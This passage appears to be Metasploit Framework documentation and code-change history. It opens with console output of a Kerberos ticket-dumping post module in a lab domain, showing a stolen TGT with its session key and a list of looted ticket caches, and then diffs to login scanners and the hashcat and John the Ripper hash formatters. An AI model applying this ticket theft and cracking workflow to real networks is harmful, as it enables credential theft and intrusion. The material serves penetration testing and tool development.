||||
[*] LogonTime: 2023-08-23 08:33:18 -0400
|
||||
[*] Ticket[0]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
|
||||
Primary Principal: smcintyre@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: smcintyre@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: 074bf82534302378dd8d8f911ddab2afbf64b32e8093e4fdd833e683e427c361
|
||||
Subkey: false
|
||||
Ticket Length: 1052
|
||||
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 08:33:18 -0400
|
||||
End time: 2023-08-23 18:33:18 -0400
|
||||
Renew Till: 2023-08-30 08:33:18 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
oRWAAGpgwUBqsOzC3Xq8U5cNzsuFjB0ZLIgml5HqoGPgRwMtaDs9YIPNGudWsIvu+zl1aAIY6bkw3ltzW4/Ay2IuqQXKAMVnaWhTLWMNYViyPX4lUw5vrOvR6fpshI3tx46aqXNO5hnHPmNg+zAP9nKwXNG4hj3WtdCM3NMaLGShnQhvt9RnN/rEHuOQGn9Uo+3fEO01juPq9PBMJ/HGhe6dLXWFaXUc7OscSTQ5LUTlz+ABdbz2G0wCleEJPJYsQEo0tC1XDcZRcTsMkgbrAxp3H3zQGubEmX3h36Fo2H6ftYT0NsjnU1z/keylopjV6v0aRADUnqfJs+DgevOBDF0Ccy8IRsDdDVlnxr4tK7QwOvFUuIWKEPsLM2eLesNC7yJWnkDyHiFns+PNaz1PSIoD+euNRHFqW+7cPJXro3r84UcEiukKbWrMbrkg/YSQcEr9yGikNuoWSzgYCtbMsSLBRO7JasRcSNL+p4Dc3+E5r2nWRoR9bZTQM4YM72/kzoaXXnXXuPVx2krpohGMNJIHXoQ6drqCNwYcdT/tGMoCY+BLe29/PAtywGK3Hiq3HhbDnQ8t1g63b7CTssT0edrKR72Bv/YveDn3XQ1iKNM4mot+UxGVjrStJTQ6eEp1r3ZTibSvVTn3T5E1Z3ljSyHYhIa8bGlh2Ysk2St3ZEv3emDwDXvPIGovbzkqE7NYQgPlh36siynCV2SUKj1bApWA7erk7fVTyM/swH7OFa+ekZ+J88F02fanFtvrxGOhKOBfYL50UAas5o+32cqgIrPlip6JXe3BZ2fpr71mcZo4YYzUxopFYbox3FdH95HdQVG7PNg93e3+2XvnrkWEc2md+UhYacKvMMBrXzGAz1d+ea/V3Yt2EgZc1WWAWoKVCfw6RUeTQVs2pWjq7j2APjhzjAEa4s543xgmT0jIHZnfkGzTwjM5f5mhj1KeFkff98pEQX+QjjBFnaRDnIkBmzRmAyJNzxjwAhiW/RNxYNYG3UOnpmxxV443vN3wr3e+MFvBG9azFlq36iWs+2jGNUuFTdH6RECf7/tNun+DE622vI1hIaBJLAHMHzdSIt9kLTQ+OzECGjH0QNRHHibwLhyR36UHShr/ei4/PO87kKw+ZVpb0rHNcICaT80MhCIGWLlH5SErAKQe/vOkDgqeLW+keCbZfW8F7QBXc6C9kUpzUQuIII7KvLKskbgwhqPhoVV70x9vFXWG1xSFwzPJdQmDRBanyQ0xoQFhmt2MO6lMRXTpheAAL+uBJOpgYWX5GBA=
|
||||
[*] LogonSession LUID: 0x00004d345
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:33:18 -0400
|
||||
[*] LogonSession LUID: 0x00004bfb9
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:33:17 -0400
|
||||
[*] Post module execution completed
|
||||
msf6 post(windows/manage/kerberos_tickets) > klist
|
||||
Kerberos Cache
|
||||
==============
|
||||
id host principal sname issued status path
|
||||
-- ---- --------- ----- ------ ------ ----
|
||||
398 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin
|
||||
399 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
|
||||
400 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
|
||||
401 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
|
||||
404 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:18 -0400 active /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
|
||||
402 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
|
||||
403 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
|
||||
|
||||
msf6 post(windows/manage/kerberos_tickets) >
|
||||
```
|
||||
@@ -124,6 +124,8 @@ module Metasploit
|
||||
when hash =~ /^\*?[\da-fA-F]{32}\*[\da-fA-F]{32}$/
|
||||
# we accept the beginning star as optional
|
||||
return 'vnc'
|
||||
when hash =~ /^\$pbkdf2-sha256\$[0-9]+\$[a-z0-9\/.]+\$[a-z0-9\/.]{43}$/i
|
||||
return 'pbkdf2-sha256'
|
||||
end
|
||||
''
|
||||
end
|
||||
|
||||
@@ -55,13 +55,12 @@ module Metasploit
|
||||
when Msf::Exploit::Remote::AuthOption::KERBEROS
|
||||
raise Msf::ValidationError, 'The Ldap::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
|
||||
raise Msf::ValidationError, 'The DOMAIN option is required when using Kerberos authentication.' if opts[:domain].blank?
|
||||
raise Msf::ValidationError, 'The DomainControllerRhost is required when using Kerberos authentication.' if opts[:domain_controller_rhost].blank?
|
||||
|
||||
offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(opts[:ldap_krb_offered_enc_types])
|
||||
raise Msf::ValidationError, 'At least one encryption type is required when using Kerberos authentication.' if offered_etypes.empty?
|
||||
|
||||
kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
|
||||
host: opts[:domain_controller_rhost],
|
||||
host: opts[:domain_controller_rhost].blank? ? nil : opts[:domain_controller_rhost],
|
||||
hostname: opts[:ldap_rhostname],
|
||||
realm: opts[:domain],
|
||||
username: opts[:username],
|
||||
|
||||
@@ -92,7 +92,7 @@ module Metasploit
|
||||
|
||||
response_data = {}
|
||||
if valid_response?(response)
|
||||
packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response)
|
||||
packet = Rex::Proto::DRDA::Packet::SERVER_PACKET.new.read(response)
|
||||
response_data = Rex::Proto::DRDA::Utils.server_packet_info(packet)
|
||||
end
|
||||
response_data
|
||||
@@ -115,7 +115,7 @@ module Metasploit
|
||||
# @param response [String] The unprocessed response packet
|
||||
# @return [Boolean] Whether the authentication was successful
|
||||
def successful_login?(response)
|
||||
packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response)
|
||||
packet = Rex::Proto::DRDA::Packet::SERVER_PACKET.new.read(response)
|
||||
packet_info = Rex::Proto::DRDA::Utils.server_packet_info(packet)
|
||||
if packet_info[:db_login_success]
|
||||
true
|
||||
|
||||
@@ -57,6 +57,10 @@ module Metasploit
|
||||
# A factory method for creating a kerberos authenticator
|
||||
attr_accessor :kerberos_authenticator_factory
|
||||
|
||||
# @returns [Boolean] If a login is successful and this attribute is true - a RubySMB::Client instance is used as proof,
|
||||
# and the socket is not immediately closed
|
||||
attr_accessor :use_client_as_proof
|
||||
|
||||
# If login is successul and {Result#access_level} is not set
|
||||
# then arbitrary credentials are accepted. If it is set to
|
||||
# Guest, then arbitrary credentials are accepted, but given
|
||||
@@ -129,6 +133,14 @@ module Metasploit
|
||||
case status_code
|
||||
when WindowsError::NTStatus::STATUS_SUCCESS, WindowsError::NTStatus::STATUS_PASSWORD_MUST_CHANGE, WindowsError::NTStatus::STATUS_PASSWORD_EXPIRED
|
||||
status = Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
# This module no long owns the socket, return it as proof so the calling context can perform additional operations
|
||||
# Additionally assign values to nil to avoid closing the socket etc automatically
|
||||
if use_client_as_proof
|
||||
proof = client
|
||||
client = nil
|
||||
self.sock = nil
|
||||
self.dispatcher = nil
|
||||
end
|
||||
when WindowsError::NTStatus::STATUS_ACCOUNT_LOCKED_OUT
|
||||
status = Metasploit::Model::Login::Status::LOCKED_OUT
|
||||
when WindowsError::NTStatus::STATUS_LOGON_FAILURE, WindowsError::NTStatus::STATUS_ACCESS_DENIED
|
||||
|
||||
@@ -217,6 +217,8 @@ module Metasploit
|
||||
'1711'
|
||||
when 'Raw-MD5u'
|
||||
'30'
|
||||
when 'pbkdf2-sha256'
|
||||
'10900'
|
||||
end
|
||||
end
|
||||
|
||||
@@ -443,7 +445,7 @@ module Metasploit
|
||||
# @return [Array] An array set up for {::IO.popen} to use
|
||||
def hashcat_crack_command
|
||||
cmd_string = binary_path
|
||||
cmd = [cmd_string, '--session=' + cracker_session_id, '--logfile-disable']
|
||||
cmd = [cmd_string, '--session=' + cracker_session_id, '--logfile-disable', '--quiet', '--username']
|
||||
|
||||
if pot.present?
|
||||
cmd << ('--potfile-path=' + pot)
|
||||
@@ -561,7 +563,7 @@ module Metasploit
|
||||
|
||||
pot_file = pot || john_pot_file
|
||||
if cracker == 'hashcat'
|
||||
cmd = [cmd_string, '--show', "--potfile-path=#{pot_file}", "--hash-type=#{jtr_format_to_hashcat_format(format)}"]
|
||||
cmd = [cmd_string, '--show', '--username', "--potfile-path=#{pot_file}", "--hash-type=#{jtr_format_to_hashcat_format(format)}"]
|
||||
elsif cracker == 'john'
|
||||
cmd = [cmd_string, '--show', "--pot=#{pot_file}", "--format=#{format}"]
|
||||
|
||||
|
||||
@@ -1,106 +1,144 @@
|
||||
# This method takes a {framework.db.cred}, and normalizes it
|
||||
# to the string format hashcat is expecting.
|
||||
# https://hashcat.net/wiki/doku.php?id=example_hashes
|
||||
#
|
||||
# @param cred [credClass] A credential from framework.db
|
||||
# @return [String] The hash in jtr format or nil on no match.
|
||||
def hash_to_hashcat(cred)
|
||||
case cred.private.type
|
||||
when 'Metasploit::Credential::NTLMHash'
|
||||
both = cred.private.data.split(':')
|
||||
if both[0].upcase == 'AAD3B435B51404EEAAD3B435B51404EE' # lanman empty, return ntlm
|
||||
return both[1] # ntlm hash-mode: 1000
|
||||
end
|
||||
module Metasploit
|
||||
module Framework
|
||||
module PasswordCracker
|
||||
module Hashcat
|
||||
module Formatter
|
||||
# This method takes a {framework.db.cred}, and normalizes it
|
||||
# to the string format hashcat is expecting.
|
||||
# https://hashcat.net/wiki/doku.php?id=example_hashes
|
||||
#
|
||||
# @param cred [credClass] A credential from framework.db
|
||||
# @return [String] The hash in jtr format or nil on no match.
|
||||
def self.hash_to_hashcat(cred)
|
||||
case cred.private.type
|
||||
when 'Metasploit::Credential::NTLMHash'
|
||||
both = cred.private.data.split(':')
|
||||
if both[0].upcase == 'AAD3B435B51404EEAAD3B435B51404EE' # lanman empty, return ntlm
|
||||
return "#{cred.id}:#{both[1]}" # ntlm hash-mode: 1000
|
||||
end
|
||||
|
||||
return both[0] # give lanman, hash-mode: 3000
|
||||
when 'Metasploit::Credential::PostgresMD5' # hash-mode: 12
|
||||
if cred.private.jtr_format =~ /postgres|raw-md5/
|
||||
hash_string = cred.private.data
|
||||
hash_string.gsub!(/^md5/, '')
|
||||
return "#{hash_string}:#{cred.public.username}"
|
||||
end
|
||||
when 'Metasploit::Credential::NonreplayableHash'
|
||||
case cred.private.jtr_format
|
||||
# oracle 11+ password hash descriptions:
|
||||
# this password is stored as a long ascii string with several sections
|
||||
# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/
|
||||
# example:
|
||||
# hash = []
|
||||
# hash << "S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;"
|
||||
# hash << "H:DC9894A01797D91D92ECA1DA66242209;"
|
||||
# hash << "T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C"
|
||||
# puts hash.join('')
|
||||
# S: = 60 characters -> sha1(password + salt (10 bytes))
|
||||
# 40 char sha1, 20 char salt
|
||||
# hash is 8F2D65FB5547B71C8DA3760F10960428CD307B1C
|
||||
# salt is 6271691FC55C1F56554A
|
||||
# H: = 32 characters
|
||||
# legacy MD5
|
||||
# T: = 160 characters
|
||||
# PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
|
||||
when /hmac-md5/
|
||||
data = cred.private.data.split('#')
|
||||
password = Rex::Text.encode_base64("#{cred.public.username} #{data[1]}")
|
||||
return "$cram_md5$#{Rex::Text.encode_base64(data[0])}$#{password}"
|
||||
when /raw-sha1|oracle11/ # oracle 11, hash-mode: 112
|
||||
if cred.private.data =~ /S:([\dA-F]{60})/ # oracle 11
|
||||
# hashcat wants a 40 character string, : 20 character string
|
||||
return Regexp.last_match(1).scan(/.{1,40}/m).join(':').downcase
|
||||
return "#{cred.id}:#{both[0]}" # give lanman, hash-mode: 3000
|
||||
when 'Metasploit::Credential::PostgresMD5' # hash-mode: 12
|
||||
if cred.private.jtr_format =~ /postgres|raw-md5/
|
||||
hash_string = cred.private.data
|
||||
hash_string.gsub!(/^md5/, '')
|
||||
return "#{cred.id}:#{hash_string}:#{cred.public.username}"
|
||||
end
|
||||
when 'Metasploit::Credential::NonreplayableHash'
|
||||
case cred.private.jtr_format
|
||||
# oracle 11+ password hash descriptions:
|
||||
# this password is stored as a long ascii string with several sections
|
||||
# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/
|
||||
# example:
|
||||
# hash = []
|
||||
# hash << "S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;"
|
||||
# hash << "H:DC9894A01797D91D92ECA1DA66242209;"
|
||||
# hash << "T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C"
|
||||
# puts hash.join('')
|
||||
# S: = 60 characters -> sha1(password + salt (10 bytes))
|
||||
# 40 char sha1, 20 char salt
|
||||
# hash is 8F2D65FB5547B71C8DA3760F10960428CD307B1C
|
||||
# salt is 6271691FC55C1F56554A
|
||||
# H: = 32 characters
|
||||
# legacy MD5
|
||||
# T: = 160 characters
|
||||
# PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
|
||||
when /^pbkdf2-sha256/
|
||||
# hashmode: 10900
|
||||
# from: $pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU
|
||||
# to: sha256:29000:Q1hzYjU5dFNMWm05QUJCTg==:s+vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU=
|
||||
|
||||
# https://hashcat.net/forum/thread-7854-post-42417.html#pid42417 ironically gives Token encoding exception
|
||||
c = cred.private.data.sub('$pbkdf2-sha256', 'sha256').split('$')
|
||||
|
||||
# This method takes a string which is likely base64 encoded
|
||||
# however, there is an arbitrary amount of = missing from the end
|
||||
# so we attempt to add = until we are able to decode it
|
||||
#
|
||||
# @param str [String] the base64-ish string
|
||||
# @return [String] the corrected string
|
||||
def add_equals_to_base64(str)
|
||||
['', '=', '=='].each do |equals|
|
||||
to_test = "#{str}#{equals}"
|
||||
Base64.strict_decode64(to_test)
|
||||
return to_test
|
||||
rescue ArgumentError
|
||||
next
|
||||
end
|
||||
nil
|
||||
end
|
||||
|
||||
c[2] = add_equals_to_base64(c[2].gsub('.', '+')) # pad back out
|
||||
c[3] = add_equals_to_base64(c[3].gsub('.', '+')) # pad back out
|
||||
return c.join(':')
|
||||
when /hmac-md5/
|
||||
data = cred.private.data.split('#')
|
||||
password = Rex::Text.encode_base64("#{cred.public.username} #{data[1]}")
|
||||
return "#{cred.id}:$cram_md5$#{Rex::Text.encode_base64(data[0])}$#{password}"
|
||||
when /raw-sha1|oracle11/ # oracle 11, hash-mode: 112
|
||||
if cred.private.data =~ /S:([\dA-F]{60})/ # oracle 11
|
||||
# hashcat wants a 40 character string, : 20 character string
|
||||
return "#{cred.id}:#{Regexp.last_match(1).scan(/.{1,40}/m).join(':').downcase}"
|
||||
end
|
||||
when /oracle12c/
|
||||
if cred.private.data =~ /T:([\dA-F]{160})/ # oracle 12c, hash-mode: 12300
|
||||
return "#{cred.id}:#{Regexp.last_match(1).upcase}"
|
||||
end
|
||||
when /dynamic_1506|postgres/
|
||||
# this may not be correct
|
||||
if cred.private.data =~ /H:([\dA-F]{32})/ # oracle 11, hash-mode: 3100
|
||||
return "#{cred.id}:#{Regexp.last_match(1)}:#{cred.public.username}"
|
||||
end
|
||||
when /oracle/ # oracle
|
||||
if cred.private.jtr_format.start_with?('des') # 'des,oracle', not oracle11/12c, hash-mode: 3100
|
||||
return "#{cred.id}:#{cred.private.data}"
|
||||
end
|
||||
when /dynamic_82/
|
||||
return "#{cred.id}:#{cred.private.data.sub('$HEX$', ':').sub('$dynamic_82$', '')}"
|
||||
when /mysql-sha1/
|
||||
# lowercase, and remove the first character if its a *
|
||||
return "#{cred.id}:#{cred.private.data.downcase.sub('*', '')}"
|
||||
when /md5|des|bsdi|crypt|bf/, /mssql|mssql05|mssql12|mysql/, /sha256|sha-256/,
|
||||
/sha512|sha-512/, /xsha|xsha512|PBKDF2-HMAC-SHA512/,
|
||||
/mediawiki|phpass|PBKDF2-HMAC-SHA1/,
|
||||
/android-sha1/, /android-samsung-sha1/, /android-md5/,
|
||||
/ssha/, /raw-sha512/, /raw-sha256/
|
||||
# md5(crypt), des(crypt), b(crypt), sha256, sha512, xsha, xsha512, PBKDF2-HMAC-SHA512
|
||||
# hash-mode: 500 1500 3200 7400 1800 122 1722 7100
|
||||
# mssql, mssql05, mssql12, mysql, mysql-sha1
|
||||
# hash-mode: 131, 132, 1731 200 300
|
||||
# mediawiki, phpass, PBKDF2-HMAC-SHA1
|
||||
# hash-mode: 3711, 400, 12001
|
||||
# android-sha1
|
||||
# hash-mode: 5800
|
||||
# ssha, raw-sha512, raw-sha256
|
||||
# hash-mode: 111, 1700, 1400
|
||||
return "#{cred.id}:#{cred.private.data}"
|
||||
when /^mscash$/
|
||||
# hash-mode: 1100
|
||||
data = cred.private.data.split(':').first
|
||||
if /^M\$(?<salt>[[:print:]]+)#(?<hash>[\da-fA-F]{32})/ =~ data
|
||||
return "#{cred.id}:#{hash}:#{salt}"
|
||||
end
|
||||
when /^mscash2$/
|
||||
# hash-mode: 2100
|
||||
return "#{cred.id}:#{cred.private.data.split(':').first}"
|
||||
when /netntlm(v2)?/
|
||||
# netntlm, netntlmv2
|
||||
# hash-mode: 5500 5600
|
||||
return "#{cred.id}:#{cred.private.data}"
|
||||
when /^vnc$/
|
||||
# https://hashcat.net/forum/thread-8833.html
|
||||
# while we can do the transformation, we'd have to throw extra flags at hashcat which aren't currently written into the lib for automation
|
||||
nil
|
||||
when /^krb5$/
|
||||
return "#{cred.id}:#{cred.private.data}"
|
||||
end
|
||||
end
|
||||
nil
|
||||
end
|
||||
end
|
||||
end
|
||||
when /oracle12c/
|
||||
if cred.private.data =~ /T:([\dA-F]{160})/ # oracle 12c, hash-mode: 12300
|
||||
return Regexp.last_match(1).upcase
|
||||
end
|
||||
when /dynamic_1506|postgres/
|
||||
# this may not be correct
|
||||
if cred.private.data =~ /H:([\dA-F]{32})/ # oracle 11, hash-mode: 3100
|
||||
return "#{Regexp.last_match(1)}:#{cred.public.username}"
|
||||
end
|
||||
when /oracle/ # oracle
|
||||
if cred.private.jtr_format.start_with?('des') # 'des,oracle', not oracle11/12c, hash-mode: 3100
|
||||
return cred.private.data.to_s
|
||||
end
|
||||
when /dynamic_82/
|
||||
return cred.private.data.sub('$HEX$', ':').sub('$dynamic_82$', '')
|
||||
when /mysql-sha1/
|
||||
# lowercase, and remove the first character if its a *
|
||||
return cred.private.data.downcase.sub('*', '')
|
||||
when /md5|des|bsdi|crypt|bf/, /mssql|mssql05|mssql12|mysql/, /sha256|sha-256/,
|
||||
/sha512|sha-512/, /xsha|xsha512|PBKDF2-HMAC-SHA512/,
|
||||
/mediawiki|phpass|PBKDF2-HMAC-SHA1/,
|
||||
/android-sha1/, /android-samsung-sha1/, /android-md5/,
|
||||
/ssha/, /raw-sha512/, /raw-sha256/
|
||||
# md5(crypt), des(crypt), b(crypt), sha256, sha512, xsha, xsha512, PBKDF2-HMAC-SHA512
|
||||
# hash-mode: 500 1500 3200 7400 1800 122 1722 7100
|
||||
# mssql, mssql05, mssql12, mysql, mysql-sha1
|
||||
# hash-mode: 131, 132, 1731 200 300
|
||||
# mediawiki, phpass, PBKDF2-HMAC-SHA1
|
||||
# hash-mode: 3711, 400, 12001
|
||||
# android-sha1
|
||||
# hash-mode: 5800
|
||||
# ssha, raw-sha512, raw-sha256
|
||||
# hash-mode: 111, 1700, 1400
|
||||
return cred.private.data
|
||||
when /^mscash$/
|
||||
# hash-mode: 1100
|
||||
data = cred.private.data.split(':').first
|
||||
if /^M\$(?<salt>[[:print:]]+)#(?<hash>[\da-fA-F]{32})/ =~ data
|
||||
return "#{hash}:#{salt}"
|
||||
end
|
||||
when /^mscash2$/
|
||||
# hash-mode: 2100
|
||||
return cred.private.data.split(':').first
|
||||
when /netntlm(v2)?/
|
||||
# netntlm, netntlmv2
|
||||
# hash-mode: 5500 5600
|
||||
return cred.private.data
|
||||
when /^vnc$/
|
||||
# https://hashcat.net/forum/thread-8833.html
|
||||
# while we can do the transformation, we'd have to throw extra flags at hashcat which aren't currently written into the lib for automation
|
||||
nil
|
||||
when /^krb5$/
|
||||
return cred.private.data.to_s
|
||||
end
|
||||
end
|
||||
nil
|
||||
end
|
||||
|
||||
@@ -1,88 +1,138 @@
|
||||
# This method takes a {framework.db.cred}, and normalizes it
|
||||
# to the string format JTR is expecting.
|
||||
#
|
||||
# @param cred [credClass] A credential from framework.db
|
||||
# @return [String] The hash in jtr format or nil on no match.
|
||||
def hash_to_jtr(cred)
|
||||
case cred.private.type
|
||||
when 'Metasploit::Credential::NTLMHash'
|
||||
return "#{cred.public.username}:#{cred.id}:#{cred.private.data}:::#{cred.id}"
|
||||
when 'Metasploit::Credential::PostgresMD5'
|
||||
if cred.private.jtr_format =~ /postgres|raw-md5/
|
||||
# john --list=subformats | grep 'PostgreSQL MD5'
|
||||
# UserFormat = dynamic_1034 type = dynamic_1034: md5($p.$u) (PostgreSQL MD5)
|
||||
hash_string = cred.private.data
|
||||
hash_string.gsub!(/^md5/, '')
|
||||
return "#{cred.public.username}:$dynamic_1034$#{hash_string}"
|
||||
end
|
||||
when 'Metasploit::Credential::NonreplayableHash'
|
||||
case cred.private.jtr_format
|
||||
# oracle 11+ password hash descriptions:
|
||||
# this password is stored as a long ascii string with several sections
|
||||
# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/
|
||||
# example:
|
||||
# hash = []
|
||||
# hash << "S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;"
|
||||
# hash << "H:DC9894A01797D91D92ECA1DA66242209;"
|
||||
# hash << "T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C"
|
||||
# puts hash.join('')
|
||||
# S: = 60 characters -> sha1(password + salt (10 bytes))
|
||||
# 40 char sha1, 20 char salt
|
||||
# hash is 8F2D65FB5547B71C8DA3760F10960428CD307B1C
|
||||
# salt is 6271691FC55C1F56554A
|
||||
# H: = 32 characters
|
||||
# legacy MD5
|
||||
# T: = 160 characters
|
||||
# PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
|
||||
when /raw-sha1|oracle11/ # oracle 11
|
||||
if cred.private.data =~ /S:([\dA-F]{60})/ # oracle 11
|
||||
return "#{cred.public.username}:#{Regexp.last_match(1)}:#{cred.id}:"
|
||||
end
|
||||
when /oracle12c/
|
||||
if cred.private.data =~ /T:([\dA-F]{160})/ # oracle 12c
|
||||
return "#{cred.public.username}:$oracle12c$#{Regexp.last_match(1).downcase}:#{cred.id}:"
|
||||
end
|
||||
when /dynamic_1506/
|
||||
if cred.private.data =~ /H:([\dA-F]{32})/ # oracle 11
|
||||
return "#{cred.public.username.upcase}:$dynamic_1506$#{Regexp.last_match(1)}:#{cred.id}:"
|
||||
end
|
||||
when /oracle/ # oracle
|
||||
if cred.private.jtr_format.start_with?('des') # 'des,oracle', not oracle11/12c
|
||||
return "#{cred.public.username}:O$#{cred.public.username}##{cred.private.data}:#{cred.id}:"
|
||||
end
|
||||
when /md5|des|bsdi|crypt|bf|sha256|sha512|xsha512/
|
||||
# md5(crypt), des(crypt), b(crypt), sha256(crypt), sha512(crypt), xsha512
|
||||
return "#{cred.public.username}:#{cred.private.data}:::::#{cred.id}:"
|
||||
when /netntlm/
|
||||
return "#{cred.private.data}::::::#{cred.id}:"
|
||||
when /qnx/
|
||||
# https://moar.so/blog/qnx-password-hash-formats.html
|
||||
hash = cred.private.data.end_with?(':0:0') ? cred.private.data : "#{cred.private.data}:0:0"
|
||||
return "#{cred.public.username}:#{hash}"
|
||||
when /Raw-MD5u/
|
||||
# This is just md5(unicode($p)), where $p is the password.
|
||||
# Avira uses to store their passwords, there may be other apps that also use this though.
|
||||
# The trailing : shows an empty salt. This is because hashcat only has one unicode hash
|
||||
# format which is combatible, type 30, but that is listed as md5(utf16le($pass).$salt)
|
||||
# with a sample hash of b31d032cfdcf47a399990a71e43c5d2a:144816. So this just outputs
|
||||
# The hash as *hash*: so that it is both JTR and hashcat compatible
|
||||
return "#{cred.private.data}:"
|
||||
when /vnc/
|
||||
# add a beginning * if one is missing
|
||||
return "$vnc$#{cred.private.data.start_with?('*') ? cred.private.data.upcase : "*#{cred.private.data.upcase}"}"
|
||||
else
|
||||
# /mysql|mysql-sha1/
|
||||
# /mssql|mssql05|mssql12/
|
||||
# /des(crypt)/
|
||||
# /mediawiki|phpass|atlassian/
|
||||
# /dynamic_82/
|
||||
# /ssha/
|
||||
# /raw-sha512/
|
||||
# /raw-sha256/
|
||||
# This also handles *other* type credentials which aren't guaranteed to have a public
|
||||
module Metasploit
|
||||
module Framework
|
||||
module PasswordCracker
|
||||
module JtR
|
||||
module Formatter
|
||||
# This method takes a {framework.db.cred}, and normalizes it
|
||||
# to the string format JTR is expecting.
|
||||
#
|
||||
# @param cred [credClass] A credential from framework.db
|
||||
# @return [String] The hash in jtr format or nil on no match.
|
||||
def self.hash_to_jtr(cred)
|
||||
case cred.private.type
|
||||
when 'Metasploit::Credential::NTLMHash'
|
||||
return "#{cred.public.username}:#{cred.id}:#{cred.private.data}:::#{cred.id}"
|
||||
when 'Metasploit::Credential::PostgresMD5'
|
||||
if cred.private.jtr_format =~ /postgres|raw-md5/
|
||||
# john --list=subformats | grep 'PostgreSQL MD5'
|
||||
# UserFormat = dynamic_1034 type = dynamic_1034: md5($p.$u) (PostgreSQL MD5)
|
||||
hash_string = cred.private.data
|
||||
hash_string.gsub!(/^md5/, '')
|
||||
return "#{cred.public.username}:$dynamic_1034$#{hash_string}:#{cred.id}:"
|
||||
end
|
||||
when 'Metasploit::Credential::NonreplayableHash'
|
||||
case cred.private.jtr_format
|
||||
# oracle 11+ password hash descriptions:
|
||||
# this password is stored as a long ascii string with several sections
|
||||
# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/
|
||||
# example:
|
||||
# hash = []
|
||||
# hash << "S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;"
|
||||
